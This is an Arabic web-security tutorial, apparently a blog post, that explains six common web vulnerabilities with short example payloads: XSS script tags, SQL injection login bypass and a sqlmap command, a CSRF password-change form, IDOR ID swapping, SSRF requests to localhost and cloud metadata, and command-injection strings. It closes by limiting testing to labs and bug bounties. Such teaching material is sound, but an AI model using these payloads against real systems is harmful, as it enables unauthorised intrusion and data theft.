🧪 1. XSS (Cross-Site Scripting)
الهدف: تنفيذ JavaScript داخل صفحة ضحية.
🔹 مثال:
html
<script>alert('XSS')</script>
🧪 إدخاله في:
نموذج تعليق (Comment box)
عنوان البحث (Search bar)
URL:
https://vulnerable.site/search?q=<script>alert('XSS')</script>
🛠️ أدوات:
Burp Suite
OWASP ZAP
🧪 2. SQLi (SQL Injection)
الهدف: حقن استعلامات SQL للوصول أو تعديل قاعدة البيانات.
🔹 مثال بسيط (Login Bypass):
sql
' OR 1=1 --
🔹 في الحقول:
اسم المستخدم / كلمة المرور
🔹 مثال مع عنوان URL:
bash
https://site.com/product?id=1' OR '1'='1
🧠 أدوات:
sqlmap:
bash
sqlmap -u "https://site.com/product?id=1" --dbs
🧪 3. CSRF (Cross-Site Request Forgery)
الهدف: استغلال جلسة المستخدم لتنفيذ إجراء دون علمه.
🔹 مثال (تغيير كلمة مرور):
html
<form action="https://vulnerable.site/change-password" method="POST">
<input type="hidden" name="password" value="hacked123">
<input type="submit" value="Click Me">
</form>
يُرسل الضحية النموذج وهو مسجّل الدخول، فيتم تنفيذ الأمر!
✅ لا يُكشف بالأوامر، بل بالهندسة الاجتماعية وHTML.
🧪 4. IDOR (Insecure Direct Object Reference)
الهدف: الوصول إلى بيانات مستخدمين آخرين عبر تغيير رقم في الرابط أو الطلب.
🔹 مثال:
bash
GET https://site.com/user/123/profile
🔁 غيّره إلى:
GET https://site.com/user/124/profile
إذا لم يكن هناك تحقق من هوية المستخدم، فستظهر بيانات شخص آخر.
✅ افحص دائمًا:
API Endpoints
روابط "حسابي" أو "ملف التعريف"
🧪 5. SSRF (Server-Side Request Forgery)
الهدف: إجبار الخادم على إرسال طلب داخلي (مثلاً إلى localhost أو IP داخلي).
🔹 مثال:
bash
https://vulnerable.site/fetch?url=http://localhost:8080/admin
أو:
bash
http://169.254.169.254/latest/meta-data/
🧠 أدوات كشف:
Burp Suite + Intruder
SSRFmap
🧪 6. RCE (Remote Code Execution)
الهدف: تنفيذ أوامر نظام التشغيل على السيرفر.
🔹 مثال (عبر نموذج تحميل أوامر):
bash
;ls -la
أو:
bash
&& whoami
🔹 مثال على حقن أمر في URL:
bash
http://site.com/run.php?cmd=ls
🧠 أدوات:
Burp Suite Repeater
curl + مراقبة الردود
⚠️ ملاحظات مهمة:
ثغرة درجة الخطورة مسموح اختبارها؟
XSS متوسطة – خطيرة ✅ نعم، في بيئات تدريب
SQLi خطيرة ✅ نعم، في مختبرات فقط
CSRF متوسطة ✅ نعم، لتعلّم الدفاع
IDOR خطيرة ✅ فقط في Bug Bounty
SSRF خطيرة جدًا ✅ لكن بحذر شديد
RCE شديدة الخطورة ✅ في بيئات اختبار فقط
هذا توضيحات فقط
0 تعليقات